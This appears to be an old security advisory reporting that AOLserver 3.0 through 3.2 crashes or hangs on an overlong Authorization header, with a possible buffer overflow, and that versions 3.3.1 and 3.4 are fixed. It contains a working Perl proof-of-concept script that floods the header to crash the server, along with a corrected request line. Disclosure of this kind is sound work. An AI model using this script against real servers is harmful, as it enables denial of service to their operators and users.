COMMAND

    AOLserver

SYSTEMS AFFECTED

    AOLserver 3.0..3.2

PROBLEM

    Nate Haggard found  following.  Aolserver  3.0 will crash  when it
    is given a  long authorization string.   It is also  possible this
    vulnerability  will  allow  a  hacker  to  execute  arbitrary code
    through a buffer overflow.

    Here is a sample exploit:

    #!/usr/bin/perl
    use IO::Socket;
    unless (@ARGV == 1) { die "usage: $0 host ..." }
    $host = shift(@ARGV);
    $remote = IO::Socket::INET->new( Proto     => "tcp",
                                     PeerAddr  => $host,
                                     PeerPort  => "http(80)",
                                     );
    unless ($remote) { die "cannot connect to http daemon on $host" }

    $junk = "X" x 2048;
    $killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
    $remote->autoflush(1);
    print $remote $killme;
    close $remote;

    AOLserver 3.2 is also  vulnerable (Red Hat 6.0++,  kernel 2.2.19).
    Btw, above line should be:

        $killme = "GET / HTTP/1.0\r\nAuthorization: Basic ".$junk."\r\n\r\n";

    but it  doesn't matter,  though; it  seems to  make AOLserver hang
    either way.

SOLUTION

    Aolserver 3.4 and 3.3.1 are not vulnerable to this attack.